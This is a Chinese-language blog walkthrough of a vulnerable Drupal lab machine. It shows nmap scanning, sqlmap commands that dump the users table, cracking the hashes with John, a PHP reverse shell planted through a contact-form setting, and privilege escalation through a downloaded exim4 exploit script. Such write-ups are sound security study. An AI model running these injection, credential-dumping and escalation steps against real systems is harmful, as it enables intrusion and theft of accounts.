废话不多说。还是老规矩先安装上虚拟机然后一波arp-scan -l查找目标主机
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image.png)
192.168.75.141
使用nmap查询更多信息
nmap -sS -A -p 1-65535 192.168.75.141
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-1.png)
不要说,肯定又是80 22
访问看看吧
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-2-1024x405.png)
又双叒叕是Drupal的系统。。。。
看看页面上有没有什么问题吧。。。
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-3.png)
嗯??见ID就想起注入,,,
搞不好还真有,,,
and测试看看?
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-4-1024x640.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-5-1024x547.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-6-1024x612.png)
好像还真有问题,上sqlmap一把嗦看看
sqlmap -u "http://192.168.75.141/?nid=1"
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-7-1024x978.png)
666还真的有,继续看看能不能爆表出来
sqlmap -u "http://192.168.75.141/?nid=1" --dbs
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-8-1024x597.png)
sqlmap -u "http://192.168.75.141/?nid=1" -D d7db --tables
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-9.png)
吧users表导出看看有没有什么东西
sqlmap -u "http://192.168.75.141/?nid=1" -D d7db -T users --dump
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-10-1024x452.png)
两个用户、、、hash密码
用John爆破。。。
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-11.png)
用御剑扫到robots文件
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-12.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-13.png)
发现登陆点,用john账号登录
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-14-1024x435.png)
经过搜索发现一个问题,可以运行php代码
在联系我们的这个设置项里边
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-15-1024x390.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-16-1024x330.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-17-1024x476.png)
和DC-7的靶场有异曲同工之妙。。。
试着反弹shell,(需要注意的是在php代码前面最好写一些字符,否则代码无法执行,不知道什么逻辑)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-18-1024x618.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-19.png)
获取到shell了
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-20.png)
很明显,又是熟悉的www-data权限
寻找标志位为s的文件
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-21.png)
看到可疑文件exim4
查看版本
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-22.png)
查到了poc
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-23-1024x286.png)
将红框内的文件使用wget下载到靶机
chmod +x
但是这里有个问题,这个脚本是在windows下开发,每行的结尾都有^M,所以需要删除每一行结尾的^M
方法:
vi 46996.sh
:%s/^M//g
:wq
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-24.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-25.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-26.png)
评论 (0)